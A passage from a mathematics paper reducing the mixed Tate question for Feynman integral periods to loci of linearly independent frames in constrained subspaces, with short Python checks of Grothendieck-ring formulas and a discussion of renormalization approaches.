Proof. We want to show that Z°_I is mixed Tate for all nonempty I ⊆ {1, . . . , m}. To see this, notice that it is true by hypothesis for I = {1, . . . , m}, since in this case Z°_I = ∩_{i∈I} Z_i. Thus, it suffices to prove that if it is true for all I with |I| > k, then it is true for all I with |I| = k (provided k ≥ 1). Recall that, as we already used in §4 above, the distinguished triangles in the Voevodsky category of mixed Tate motives imply that, if X ↪ Y is a closed embedding, and U = Y ∖ X the complement, then if any two of X, Y, U are mixed Tate so is the third as well. The result then follows from the combined use of this property, the hypothesis, and the identity

∩_{i∈I} Z_i = ⊔_{J⊇I} Z°_J.

Since Z_1 ∪ · · · ∪ Z_m = ⊔_{I≠∅} Z°_I, we conclude that the union Z_1 ∪ · · · ∪ Z_m is mixed Tate, again by the property of mixed Tate motives mentioned above. Now, we have observed that for every graph Γ with ℓ loops and genus g (and satisfying the condition specified at the beginning of the section) the divisor Σ̂_Γ consists of components of the divisor Σ̂_{ℓ,g}. Therefore, the strata of Σ̂_Γ are unions of strata from Σ̂_{ℓ,g}. We can then reformulate our main problem as follows.
Corollary 5.4. Let, as above, Σ̂_{ℓ,g} = X_1 ∪ · · · ∪ X_N and let Σ̂_Γ be the divisors constructed out of subsets of components of Σ̂_{ℓ,g}, associated to the individual graphs. Then, for all graphs Γ with ℓ loops and genus g, the complement Σ̂_Γ ∖ (D̂_ℓ ∩ Σ̂_Γ) is mixed Tate if the loci

(∩_{i∈I} X_i) ∖ (D̂_ℓ ∩ (∩_{i∈I} X_i))

are mixed Tate for all nonempty I ⊆ {1, . . . , N}.

Proof. This is a direct consequence of Lemma 5.3.
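At the level of classes in the Grothendieck ring, the inclusion-exclusion underlying Lemma 5.3 and Corollary 5.4 is purely mechanical: for linear subspaces [Z] = L^{dim Z}, and the class of a union is the alternating sum of the classes of the intersections. The toy sketch below (ours, with made-up coordinate subspaces of A⁴) illustrates the bookkeeping.

import sympy as sp
from itertools import combinations

L = sp.symbols('L')

# A coordinate subspace of A^4 is encoded by the set of coordinates allowed
# to be nonzero; then intersection = set intersection and dim = cardinality.
Z = [frozenset({0, 1, 2}), frozenset({1, 2, 3}), frozenset({0, 2, 3})]

union_class = 0
for r in range(1, len(Z) + 1):
    for subset in combinations(Z, r):
        inter = frozenset.intersection(*subset)
        union_class += (-1) ** (r + 1) * L ** len(inter)
print(sp.expand(union_class))  # 3*L**3 - 3*L**2 + L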
Corollary 5.4 encapsulates the main reformulation of our problem, mentioned at the end of §1: the target becomes that of proving that the loci (∩_{i∈I} X_i) ∖ D̂_ℓ determined by the normal crossings divisor Σ̂_{ℓ,g} are mixed Tate. This result shows that, although in principle one is working with a different divisor Σ̂_Γ for each graph Γ, in fact it suffices to consider the divisor Σ̂_{ℓ,g}, for fixed number of loops ℓ and genus g. It is conceivable that the loci associated to a specific graph (that is, to a specific choice of components of Σ̂_{ℓ,g}) may be mixed Tate while the loci corresponding to the whole divisor Σ̂_{ℓ,g} are not. As we are seeking an explanation that would imply that all periods arising from Feynman integrals are periods of mixed Tate motives, we will optimistically venture that all loci (∩_{i∈I} X_i) ∖ D̂_ℓ may in fact turn out to be mixed Tate, for all ℓ and for g = 0: by Corollary 5.4, it would follow that all complements Σ̂_Γ ∖ (D̂_ℓ ∩ Σ̂_Γ) are mixed Tate, for all graphs Γ (satisfying our running combinatorial hypothesis). Our task is now to formulate this working hypothesis as a more concrete problem. The intersection ∩_{i∈I} X_i is a linear subspace of codimension |I| in A^{ℓ²}; in general, the intersection of a linear subspace with the determinant hypersurface is not mixed Tate (for example, the intersection of a general A³ with D̂_3 is a cone over a genus-1 curve). Thus, we have to understand in what sense the intersections ∩_{i∈I} X_i appearing in Corollary 5.4 are special; the following lemma determines some key features of these subspaces.

Lemma 5.5. Let X_{k_1}, . . . , X_{k_r} be components of Σ̂_{ℓ,g}. Then there are a basis (e_1, . . . , e_ℓ) of E and subspaces V_1, . . . , V_ℓ of E, each spanned by a subset of the basis vectors and with dim V_i ≥ 2g + i − 1, such that X_{k_1} ∩ · · · ∩ X_{k_r} consists of the matrices whose i-th row lies in V_i, for i = 1, . . . , ℓ.

Proof. Recall (Proposition 5.2) that the components X_k of Σ̂_{ℓ,g} consist of matrices for which either the (i, j) entry x_{ij} equals 0, for 1 ≤ i < j ≤ ℓ − 2g, or x_{i1} + · · · + x_{i,ℓ−2g} = 0 for 1 ≤ i ≤ ℓ − 2g. Thus, each X_k consists of ℓ-tuples (v_1, . . . , v_ℓ) for which exactly one row v_i belongs to a fixed hyperplane of E, and more precisely to one of the hyperplanes

(5.9)   x_1 + · · · + x_{ℓ−2g} = 0,   x_2 = 0,   · · · ,   x_{ℓ−2g} = 0

(with evident notation). The statement follows by choosing V_i to be the intersection of the hyperplanes corresponding to the X_k in row i, among those listed in (5.9). Since there are at most ℓ − 2g − i + 1 hyperplanes X_k involving the i-th row, dim V_i ≥ ℓ − (ℓ − 2g − i + 1) = 2g + i − 1. Finally, to obtain the basis (e_1, . . . , e_ℓ) mentioned in the statement, simply choose the basis dual to the basis (x_1 + · · · + x_{ℓ−2g}, x_2, . . . , x_ℓ) of the dual space to E.
5.3. The main questions.
In view of Lemma 5.5, for any choice V_1, . . . , V_ℓ of subspaces of an ℓ-dimensional space E, let

F(V_1, . . . , V_ℓ) := {(v_1, . . . , v_ℓ) ∈ V_1 × · · · × V_ℓ : dim⟨v_1, . . . , v_ℓ⟩ = ℓ}

denote the complement of the determinant hypersurface in the set of matrices determined by V_1, . . . , V_ℓ. An optimistic version of the question we are led to is:

Question I_ℓ. Let V_1, . . . , V_ℓ be subspaces of an ℓ-dimensional vector space. Is the locus F(V_1, . . . , V_ℓ) mixed Tate?

By Corollary 5.4 and Lemma 5.5, an affirmative answer to Question I_ℓ implies that the complement Σ̂_Γ ∖ (D̂_ℓ ∩ Σ̂_Γ) is mixed Tate for all graphs Γ with ℓ loops and satisfying the combinatorial condition given at the beginning of this section. Modulo divergence issues, this would imply that all Feynman integrals corresponding to these graphs are periods of mixed Tate motives. We will give an affirmative answer to Question I_ℓ for ℓ ≤ 3, in §6.
As Lemma 5.5 is in fact more precise, the same conclusion would be reached by answering affirmatively the following weak version of Question I ℓ : Question II ℓ . Let (e 1 , . . . , e ℓ ) be a basis of an ℓ-dimensional vector space. For i = 1, . . . , ℓ, let V i be a subspace spanned by a choice of ≥ i − 1 basis vectors. Is F(V 1 , . . . , V ℓ ) mixed Tate?
Notice that, when V_k = E for all k, both questions reproduce the statement about the hypersurface complement A^{ℓ²} ∖ D̂_ℓ proved in §4.1. One might expect that a similar inductive procedure would provide a simple approach to these questions. It is natural to consider the following apparent refinement of Question I_ℓ for 1 ≤ r ≤ ℓ (and we could similarly consider an analogous refinement Question II′_{ℓ,r} of Question II_ℓ):

Question I′_{ℓ,r}. In a vector space E of dimension ℓ, and for any choice of subspaces V_1, . . . , V_r of E, let F_ℓ(V_1, . . . , V_r) denote the locus of r-tuples (v_1, . . . , v_r) of linearly independent vectors with v_i ∈ V_i. Is the locus F_ℓ(V_1, . . . , V_r) mixed Tate?
Question I_ℓ is then the same as Question I′_{ℓ,ℓ}; and Question I′_{ℓ,r} is obtained by taking V_{r+1} = · · · = V_ℓ = E in Question I_ℓ: thus, answering Question I_ℓ is equivalent to answering Question I′_{ℓ,r} for all r ≤ ℓ. Now, for all ℓ, the case r = 1 is immediate: F_ℓ(V_1) consists of all nonzero vectors in V_1, which is trivially mixed Tate. One could then hope that an inductive procedure may yield a method for increasing r. This is carried out in §6 for r = 2 and r = 3 (in particular, we give an affirmative answer to Question I_ℓ for ℓ ≤ 3); but this approach quickly leads to the analysis of several different cases, with an increase in complexity that makes further progress along these lines seem unlikely. The main problem is that once all tuples (v_1, . . . , v_k) of linearly independent vectors such that v_i ∈ V_i have been constructed, controlling dim(V_{k+1} ∩ ⟨v_1, . . . , v_k⟩) requires consideration of a range of possibilities that depend on the position of the vectors v_i and their spans vis-à-vis the position of the next space V_{k+1}. The number of these possibilities increases rapidly. A similar approach to the simpler (but sufficient for our purposes) Question II_ℓ does not appear to circumvent this problem.
There are special cases where an inductive argument works nicely. We mention two here.
• Suppose that all the V_k in (5.10) are hyperplanes in E. Then F(V_1, . . . , V_ℓ) is mixed Tate.

In this case, following the inductive argument mentioned above, the only possibilities for V_{k+1} ∩ ⟨v_1, . . . , v_k⟩ are ⟨v_1, . . . , v_k⟩ itself, and a hyperplane in ⟨v_1, . . . , v_k⟩. The first occurs when ⟨v_1, . . . , v_k⟩ ⊆ V_{k+1}. This locus is under control, since it amounts to doing the whole construction in the hyperplane V_{k+1} rather than in E, i.e., one can argue by induction on the dimension of E. Thus, this locus is mixed Tate. The other case gives a locus that is the complement of this mixed Tate variety in another mixed Tate variety, hence, by the same argument about closed embeddings and distinguished triangles used in §4, it is also mixed Tate.

• Suppose that the V_k in (5.10) form a complete flag, V_1 ⊆ V_2 ⊆ · · · ⊆ V_ℓ = E with dim V_k = k. Then F(V_1, . . . , V_ℓ) is mixed Tate.
5.4. A reformulation.
For given subspaces V_i ⊂ E, the inductive approach suggested by Question I′_{ℓ,r} aims at constructing the set of ℓ-tuples (v_1, . . . , v_ℓ) with the two properties (1) v_i ∈ V_i; (2) dim⟨v_1, . . . , v_r⟩ = r, for all r, and proving inductively that these loci are mixed Tate, in order to show that the loci (5.10) are mixed Tate. By (2), the subspaces E_r := ⟨v_1, . . . , v_r⟩ form a complete flag E_• : E_1 ⊂ E_2 ⊂ · · · ⊂ E_ℓ = E, constrained by prescribed dimensions {d_i, e_i} of the intersections of its terms with the given subspaces V_i. This suggests the following question.

Question III_ℓ. Let V_1, . . . , V_ℓ be subspaces of an ℓ-dimensional vector space E, and let {d_i, e_i} be a prescribed collection of dimensions. Is the locus Flag_{ℓ,{d_i,e_i}}({V_i}) of complete flags E_•, with the dimensions dim(E_i ∩ V_j) prescribed by the data {d_i, e_i}, mixed Tate?

An affirmative answer to this question (for all choices of d_i, e_i) would give an affirmative answer to our main Question I_ℓ. Indeed, the locus F(V_1, . . . , V_ℓ) is a fibration on the locus Flag_{ℓ,{d_i,e_i}}({V_i}) determined in Question III_ℓ. Concretely, the procedure constructing the tuples (v_1, . . . , v_ℓ) in F(V_1, . . . , V_ℓ) over a flag E_• in this locus is:
• choose v_1 ∈ V_1 spanning E_1;
• choose v_2 ∈ V_2 with ⟨v_1, v_2⟩ = E_2;
• etc.
The class of F(V_1, . . . , V_ℓ) in the Grothendieck group would then be computed as a sum of terms, one for each allowed collection of intersection dimensions, each a product of the class of the corresponding flag locus by the classes of the fibers. The set of flags E_• satisfying conditions analogous to those specified in Question III_ℓ with respect to all terms of a fixed flag E′_• (that is: with prescribed dim(E_i ∩ E′_j) for all i and j) is a cell of the corresponding Schubert variety in the flag manifold.
It follows that Flag_{ℓ,{d_i,e_i}}({V_i}) is a disjoint union of cells, and thus certainly mixed Tate, if the V_i's form a complete flag. This gives a high-brow alternative viewpoint for the last case mentioned in §5.3.
By the same token, the set of flags E_• for which dim(E_i ∩ F) is a fixed constant is a union of Schubert cells in the flag manifold, for all subspaces F. It follows that the locus Flag_{ℓ,{d_i,e_i}}({V_i}) of Question III_ℓ is an intersection of unions of Schubert cells in the flag manifold. Such loci were studied e.g. in [16], [17], [30], [31].
Motives and manifolds of frames
The manifolds of r-frames in a given vector space are defined as follows.
Definition 6.1. Let F(V_1, . . . , V_r) ⊂ V_1 × · · · × V_r denote the locus of r-tuples (v_1, . . . , v_r) of linearly independent vectors in a vector space, where each v_i is constrained to belong to the given subspace V_i.
These are the loci appearing in Question I′_{ℓ,r}; we now omit the explicit mention of the dimension ℓ of the ambient space. The question we consider here is the one formulated in §5.3, namely to establish when the motive of the manifold of frames F(V_1, . . . , V_r) is mixed Tate. A possible strategy to answer this question is based on the following simple observations.

Lemma 6.2. Let V_1, . . . , V_r be subspaces of a given vector space V. Let 0 ≠ v_r ∈ V_r, and let π : V → V′ := V/⟨v_r⟩ be the natural projection. Let v_1, . . . , v_{r−1} be vectors such that v_i ∈ V_i, and π(v_1), . . . , π(v_{r−1}) are linearly independent. Then v_1, . . . , v_r are linearly independent.
A second equally elementary remark is that, for a given v′ ≠ 0 in the quotient V/⟨v_r⟩, and letting as above π denote the projection, the fiber π^{−1}(v′) ∩ V_i is an affine line if v_r ∈ V_i, and consists of at most one point if v_r ∉ V_i. This implies the following.

Lemma 6.3. Suppose given a stratification {S_α} of V_r with the properties that
• {S_α} is finer than the stratification induced on V_r by the subspace arrangement V_1 ∩ V_r, . . . , V_{r−1} ∩ V_r, hence the number s_α of spaces V_i (1 ≤ i < r) containing a vector v_r ∈ S_α is independent of the vector and only depends on α;
• for v_r ∈ S_α, the class F_α := [F(π(V_1), . . . , π(V_{r−1}))] also depends only on α, and not on the chosen vector v_r ∈ S_α.
Then the class in the Grothendieck group satisfies

(6.1)   [F(V_1, . . . , V_r)] = Σ_α [S_α] L^{s_α} F_α.

Proof. Indeed, by Lemma 6.2 every frame in the quotient will determine frames in V, and by the observation following that lemma, there is a whole affine space A^{s_α} of frames over a given one in the quotient.
In an inductive argument, the loci [F_α] could be assumed to be mixed Tate, and (6.1) would provide a strong indication that [F(V_1, . . . , V_r)] is then mixed Tate as well. We focus here on giving statements at the level of classes in the Grothendieck ring, for simplicity, though these same arguments, based on constructing explicit stratifications, can also be used to derive conclusions on the motives at the level of the derived category of mixed motives, in a way similar to what we did in the case of the complement of the determinant hypersurface in §4 above.
The main question is then reduced to finding conditions under which a stratification of the type described here exists. We see explicitly how the argument goes in the simplest cases of two and three subspaces. As we discuss below, the case of three subspaces is already more involved and exhibits some of the features one is bound to encounter, with a more complicated combinatorics, in the more general cases.
6.1. The case of two subspaces. Let V_1, V_2 be subspaces of a vector space V. We want to parametrize all pairs of vectors (v_1, v_2) such that v_1 ∈ V_1, v_2 ∈ V_2, and dim⟨v_1, v_2⟩ = 2. This locus can be decomposed into two pieces (which may be empty), defined by the following prescriptions:
(1) v_1 ∈ V_1 ∖ (V_1 ∩ V_2), and v_2 ∈ V_2 ∖ {0};
(2) v_1 ∈ (V_1 ∩ V_2) ∖ {0}, and v_2 ∈ V_2 ∖ ⟨v_1⟩.
It is clear that each of these two recipes produces linearly independent vectors, and that (1) and (2) exhaust the ways in which this can be done. So F(V_1, V_2) is the union of the corresponding loci. Pairs (v_1, v_2) as in (1) range over the locus (V_1 ∖ (V_1 ∩ V_2)) × (V_2 ∖ {0}), which is clearly mixed Tate. As for (2), realize it as follows:
• Consider the projective space P(V_1 ∩ V_2), with its tautological line bundle L ⊆ (V_1 ∩ V_2) × P(V_1 ∩ V_2), and the trivial bundle V_2 × P(V_1 ∩ V_2);
• the locus (2) is then the fiber product over P(V_1 ∩ V_2) of the complement of the zero-section in L with the complement of L in the trivial bundle V_2 × P(V_1 ∩ V_2).
It is clear that this description also produces a mixed Tate motive.
Note that the prescriptions given as (1) and (2) suffice to compute the class in the Grothendieck group.

Lemma 6.4. With d_i = dim V_i and d_{12} = dim(V_1 ∩ V_2),

(6.2)   [F(V_1, V_2)] = (L^{d_1} − L^{d_{12}})(L^{d_2} − 1) + (L^{d_{12}} − 1)(L^{d_2} − L).
Notice that the expression for [F(V 1 , V 2 )] is symmetric in V 1 and V 2 , though the two individual contributions (1) and (2) are not. Of course a more symmetric description of the locus can be obtained by subdividing it into four cases according to whether v 1 , v 2 are or are not in V 1 ∩ V 2 .
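The class formula (6.2) can also be tested numerically: over F_q, substituting L → q turns it into a count of pairs of linearly independent vectors (v_1, v_2) with v_i ∈ V_i. The brute-force sketch below (ours, with an arbitrary choice of coordinate subspaces of F_2⁴) performs this check.

from itertools import product

q, dim_E = 2, 4
E = list(product(range(q), repeat=dim_E))
V1 = [v for v in E if v[3] == 0]       # d1 = 3
V2 = [v for v in E if v[0] == 0]       # d2 = 3
d1, d2, d12 = 3, 3, 2                  # dim(V1 ∩ V2) = 2

def independent(v, w):
    # Over F_2, dependence of two vectors means one is zero or they coincide.
    zero = (0,) * dim_E
    return v != zero and w != zero and v != w

count = sum(1 for v1 in V1 for v2 in V2 if independent(v1, v2))
formula = (q**d1 - q**d12) * (q**d2 - 1) + (q**d12 - 1) * (q**d2 - q)
assert count == formula
print(count)  # 46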
6.2. The case of three subspaces. We are given three subspaces V_1, V_2, V_3 of a vector space, and we want to parametrize all triples of linearly independent vectors (v_1, v_2, v_3) with v_i ∈ V_i. As above, d_i will stand for the dimension of V_i, and d_{ij} for dim(V_i ∩ V_j); we also write D for dim(V_1 + V_2 + V_3). Notice that now the information on the dimension D is also needed and does not follow from the other data. This can be seen easily by thinking of the cases of three distinct lines spanning a 3-dimensional vector space or of three distinct coplanar lines. These configurations only differ in the number D, yet the set of linearly independent triples is nonempty in the first case, empty in the second. We proceed as follows. Given a choice of v_3 ∈ V_3, consider the projection π : V → V′ := V/⟨v_3⟩; in V′ we have the images π(V_1), π(V_2), to which we can apply the case r = 2 analyzed above. As we have seen, the class [F(π(V_1), π(V_2))] is determined by the dimensions of π(V_1), π(V_2) and their intersection. Thus, we need a stratification of V_3 such that, for v_3 ∈ V_3 and denoting as above by π the projection V → V/⟨v_3⟩, the dimensions of these spaces are constant along strata.
Lemma 6.5. The following 5 loci give a stratification of V_3 ∖ {0} with the properties of Lemma 6.3:
(1) (V_1 ∩ V_2 ∩ V_3) ∖ {0};
(2) (V_1 ∩ V_3) ∖ (V_1 ∩ V_2 ∩ V_3);
(3) (V_2 ∩ V_3) ∖ (V_1 ∩ V_2 ∩ V_3);
(4) ((V_1 + V_2) ∩ V_3) ∖ ((V_1 ∩ V_3) ∪ (V_2 ∩ V_3));
(5) V_3 ∖ ((V_1 + V_2) ∩ V_3).
It follows easily that the three numbers dim π(V_1), dim π(V_2), dim π(V_1 ∩ V_2) are constant along the strata. More explicitly one has the following data.
For example, in the fourth (and most interesting) case, dim π(V_1) = d_1 and dim π(V_2) = d_2, while dim(π(V_1) ∩ π(V_2)) = d_{12} + 1 strictly exceeds dim π(V_1 ∩ V_2) = d_{12}. Lemma 6.4 converts this information into the list of the classes [F_α], and one obtains the corresponding list of cases. The number s_α is immediately read off the geometry. The last ingredient consists of the class [S_α], which is also essentially immediate. The only item that deserves attention is the dimension of (V_1 + V_2) ∩ V_3. This is dim(V_1 + V_2) + d_3 − D, and as dim(V_1 + V_2) = d_1 + d_2 − d_{12}, it equals d_1 + d_2 + d_3 − d_{12} − D. With this understood one obtains the following list of cases.
This completes the proof.
We can now apply equation (6.1), and this gives the following result.
Lemma 6.6. The class of F(V_1, V_2, V_3) in the Grothendieck group is of the form (6.3), an explicit polynomial in L determined by the dimensions d_1, d_2, d_3, d_{12}, d_{13}, d_{23} and D, obtained by summing the contributions [S_α] L^{s_α} F_α of the five strata of Lemma 6.5 according to (6.1).

Notice once again that the expression (6.3) is symmetric in V_1, V_2, V_3, unlike the contributions of the individual strata. Slightly more refined considerations, in the style of those sketched in §6.1, prove that [F(V_1, V_2, V_3)] is in fact mixed Tate.
In principle, the procedure applied here should work for a larger number of subspaces: the main task amounts to the determination of a stratification of the last subspace satisfying the properties given in Lemma 6.3. This is bound to be rather challenging for r ≥ 4: already for r = 4 one can produce examples for which the closures of the strata are not linear subspaces. This is in fact the case already for V_1, V_2, V_3 planes in general position in a 4-dimensional ambient space E: the unique quadric cone containing V_1, V_2, V_3 is the closure of a stratum in a stratification of V_4 = E satisfying the properties listed in Lemma 6.3.

6.3. Graphs with three loops. One can apply the formula of Lemma 6.6 to compute explicitly the motive (as a class in the Grothendieck group) for the locus of intersection of the divisor with normal crossings Σ̂_{ℓ,g} of (5.1) with the complement of the determinant hypersurface, in the case of (planar) graphs with three loops.
As pointed out in the discussion following Corollary 5.4, studying Σ̂_{3,0} suffices in order to get analogous information for Σ̂_Γ for every graph with three loops satisfying the condition specified at the beginning of §5 (guaranteeing that the corresponding map τ is injective). The divisor Σ̂_{3,0} is the divisor corresponding to the "wheel with three spokes" graph (the skeleton of the tetrahedron). This graph has matrix M_Γ(t) given by

M_Γ(t) = ( t_1 + t_2 + t_4    −t_1               −t_2
           −t_1               t_1 + t_3 + t_5    −t_3
           −t_2               −t_3               t_2 + t_3 + t_6 ).

Here, t_1, . . . , t_6 are variables associated with the six edges of the graph, labeled as in Figure 6.
Choose the internal faces with counterclockwise orientation as the basis of loops. Then any orientation for the edges leads to the matrix displayed above. Labeling entries of the matrix as x_{ij}, we can obtain t_1, . . . , t_6 as pull-backs of the following:

t_1 = −x_12,   t_2 = −x_13,   t_3 = −x_23,
t_4 = x_11 + x_12 + x_13,   t_5 = x_21 + x_22 + x_23,   t_6 = x_31 + x_32 + x_33.

Thus, we are considering the divisor Σ̂_{3,0} with normal crossings given by the equation

x_12 x_13 x_23 (x_11 + x_12 + x_13)(x_21 + x_22 + x_23)(x_31 + x_32 + x_33) = 0.

We want to obtain an explicit description, as a class in the Grothendieck group, of the intersection of this locus with the complement of the determinant hypersurface D̂_3 in A⁹. By inclusion-exclusion (cf. §5.2) this can be done by carrying out the computation for all intersections of subsets of the components of this divisor. Since there are 6 components, there are 2⁶ = 64 such intersections.
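As a consistency check on the matrix above, det M_Γ(t) must equal the Kirchhoff graph polynomial Ψ_Γ(t), the sum over the 16 spanning trees of the tetrahedron graph of the products of the variables of the edges not in the tree. The sketch below (ours, assuming SymPy; t_1, t_2, t_3 taken as the spokes, consistently with the matrix) verifies this.

from itertools import combinations
import sympy as sp

ts = sp.symbols('t1:7')
t1, t2, t3, t4, t5, t6 = ts
M = sp.Matrix([
    [t1 + t2 + t4, -t1,          -t2         ],
    [-t1,          t1 + t3 + t5, -t3         ],
    [-t2,          -t3,          t2 + t3 + t6],
])

# The wheel with three spokes is K4: hub 0, rim vertices 1, 2, 3.
edge = {t1: (0, 1), t2: (0, 2), t3: (0, 3),
        t4: (1, 2), t5: (1, 3), t6: (2, 3)}

def is_spanning_tree(edges):
    # Union-find: 3 edges on 4 vertices form a spanning tree iff acyclic.
    parent = list(range(4))
    def find(a):
        while parent[a] != a:
            parent[a] = parent[parent[a]]
            a = parent[a]
        return a
    for u, v in edges:
        ru, rv = find(u), find(v)
        if ru == rv:
            return False
        parent[ru] = rv
    return True

trees = [T for T in combinations(ts, 3) if is_spanning_tree([edge[e] for e in T])]
psi = sum(sp.prod([e for e in ts if e not in T]) for T in trees)
assert len(trees) == 16 and sp.expand(M.det() - psi) == 0
print(sp.expand(psi))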
Each of these possibilities determines a triple of subspaces V_1, V_2, V_3 of E (cf. Lemma 5.5), constraining the rows v_1, v_2, v_3 of the matrix (x_{ij}); the corresponding locus in the complement of the determinant is parameterized by the triples of linearly independent vectors v_1, v_2, v_3 with v_i ∈ V_i.
Thus, to begin with, one computes for each of these cases the corresponding class [F(V 1 , V 2 , V 3 )] using Lemma 6.6.
Note that each of these classes is necessarily a multiple of (L − 1)³: indeed, once the directions of v_1, v_2, v_3 are specified, the set of vectors with those directions forms a (C*)³. We list the classes here, divided by this constant factor (L − 1)³. Each class is marked according to the components of Σ̂_{3,0} containing the corresponding locus: for example, • • • • • • corresponds to the complement of D̂_3 in the intersection X_1 ∩ X_2 ∩ X_6, where X_i pulls back to t_i via τ as above (thus, X_1 ∩ X_2 ∩ X_6 has equations x_12 = x_13 = x_31 + x_32 + x_33 = 0).
Next, one applies inclusion-exclusion to go from the classes [F(V_1, V_2, V_3)] as above, which correspond to the complement of the determinant in the subspaces obtained as intersections of the 6 divisors, to the classes corresponding to the complement of the determinant in the complement of smaller subspaces in a given subspace. This produces the following list of classes in the Grothendieck group; in this table, the classes do include the common factor (L − 1)³.
It is interesting to notice that the expressions simplify when one takes inclusion-exclusion into account. The cancellations due to inclusion-exclusion mostly lead to classes of the form L^a (L − 1)^b.
In terms of Feynman integrals, in the case of the wheel with three spokes, we are interested in the relative cohomology of the pair (A⁹ ∖ D̂_3, Σ̂_{3,0} ∖ (D̂_3 ∩ Σ̂_{3,0})). The hypersurface complement A⁹ ∖ D̂_3 has class (L³ − 1)(L³ − L)(L³ − L²), by Proposition 4.4. The class of Σ̂_{3,0} ∖ (D̂_3 ∩ Σ̂_{3,0}) is the sum of all the contributions listed above (these are all the strata of Σ̂_{3,0} ∖ (D̂_3 ∩ Σ̂_{3,0})) or, equivalently, the difference of (6.5) and the last item • • • • • •; the main information is carried by the class • • • • • •. In the case of other 3-loop graphs Γ, such as the one illustrated in Figure 7, the divisor Σ̂_Γ is a union of components of Σ̂_{3,0} (cf. Proposition 5.2). The class of the locus Σ̂_Γ ∖ (D̂_3 ∩ Σ̂_Γ) may be obtained by adding up all contributions listed above, for the strata contained in Σ̂_Γ. For the example given in Figure 7, these are the strata contained in the divisors X_1, . . . , X_5; the corresponding classes are those marked by * * * * * *, where at least one of the first five * is •; or, equivalently, the difference of (6.5) and the classes of the strata not contained in X_1 ∪ · · · ∪ X_5.
Divergences and renormalization
Our analysis in the previous sections of this paper concentrated on the task of showing that a certain relative cohomology is a realization of a mixed Tate motive m(X, Y), where the loci X and Y are constructed, respectively, as the complement of the determinant hypersurface and the intersection with this complement of a normal crossings divisor Σ̂_Γ that contains the image of the boundary of the domain of integration σ_n under the map τ_Γ, for any graph Γ with fixed number of loops and fixed genus. Knowing that m(X, Y) is a mixed Tate motive implies that, when convergent, the parametric Feynman integral for all such graphs is a period of a mixed Tate motive. This, however, does not take into account the presence of divergences in the Feynman integrals.
There are several different approaches to regularize and renormalize the divergent integrals. We outline here some of the possibilities and comment on how they can be made compatible with our approach. 7.1. Blowups. One possible approach to dealing with divergences coming from the intersections of the divisor Σ n with the graph hypersurface X Γ is the one proposed by Bloch-Esnault-Kreimer in [10], namely one can proceed to perform a series of blowups of strata of this intersection until one has separated the domain of integration from the hypersurface and in this way regularized the integral.
In our setting, a similar approach should be reformulated in the ambient A^{ℓ²} and in terms of the intersection of the determinant hypersurface D̂_ℓ with the divisor Σ̂_{ℓ,g}. If the main question posed in §5.3 has an affirmative answer, then this intersection admits a stratification by mixed Tate nonsingular loci. It seems likely that a suitable sequence of blow-ups would then have the effect of regularizing the integral, while at the same time maintaining the motivic nature of the relevant loci unaltered. We intend to return to a more detailed analysis of this approach in future work.

7.2. Dimensional regularization and L-functions. Belkale and Brosnan showed in [4] that dimensionally regularized Feynman integrals can be written in the form of a local Igusa L-function, where the coefficients of the Laurent series expansion are periods, provided the integrals describing them are convergent. Such periods have an explicit description in terms of integrals, on simplices σ_n and cubes [0, 1]^r, of algebraic differential forms, for f(t) = Ψ_Γ(t) the graph polynomial. The nature of such integrals as periods would still be controlled by the same motivic loci that are involved in the original parametric Feynman integral before dimensional regularization. The result of [4] is formulated only for the case of log-divergent integrals, where only the graph polynomial Ψ_Γ(t) is present in the Feynman parametric form and not the polynomial P_Γ(t, p). The result was extended to the more general non-log-divergent case by Bogner and Weinzierl in [12]. In this approach, if there are singularities in the integrals that compute the coefficients of the Laurent series expansion of the local Igusa L-function giving the dimensionally regularized Feynman integral, these can be treated by an algorithmic procedure developed by Bogner and Weinzierl in [13] (see also the short survey [14]). The algorithm is designed to split the divergent integral into sectors where a change of variables that introduces a blowup at the origin isolates the divergence as a polar term in the regularization parameter ǫ. One can then subtract this polar part in the Laurent series expansion in the variable ǫ and eliminate the divergence. The iteration part of the algorithm is based on Hironaka's polyhedral game, and it is shown in [13] that the resulting algorithm terminates in finite time.
If one uses this approach in our context one will have to show that the changes of variables introduced in the process of evaluating the integrals in sectors do not alter the motivic nature of the loci involved.
7.3. Deformations. An alternative to the use of blowups is the use of deformations. We discuss here the simplest possible procedure one can think of that uses deformations of the graph hypersurface (or of the determinant hypersurface). It is not the most satisfactory deformation method, because it does not lead immediately to a "minimal subtraction" procedure, but it suffices here to illustrate the idea.
Again, for our purposes, we can assume to work in the "stable range" where D is sufficiently large, so that both exponents α and β of Ψ_Γ(t) and V_Γ(t, p) in the parametric integral (7.1) are positive. The case of small D, which is of direct physics interest, leads one to the different problem of considering the hypersurfaces defined by P_Γ(t, p), as a function of the external momenta p, and the singularities produced by the intersections of these with the domain of integration. This type of analysis can be found in the physics literature, for instance in [32]. See also [7], §18. Assuming to work in the range where α and β are positive, one can choose to regularize the integral (7.1) by introducing a deformation parameter ǫ ∈ C ∖ R_+ and replacing Ψ_Γ(t) with Ψ_Γ(t) − ǫ in (7.1). This has the effect of replacing, as locus of the singularities of the integrand, the graph hypersurface X̂_Γ = {Ψ_Γ(t) = 0}, with the level set X̂_{Γ,ǫ} = {Ψ_Γ(t) = ǫ} of the map Ψ_Γ : A^n → A. For a choice of ǫ in the cut plane C ∖ R_+, the hypersurface X̂_{Γ,ǫ} does not intersect the domain of integration σ_n. In fact, for t_i ≥ 0 one has Ψ_Γ(t) ≥ 0. This choice has therefore the effect of desingularizing the integral. The resulting function of ǫ extends holomorphically to a function on C ∖ I, where I ⊂ R_+ is the bounded interval of values of Ψ_Γ on σ_n.
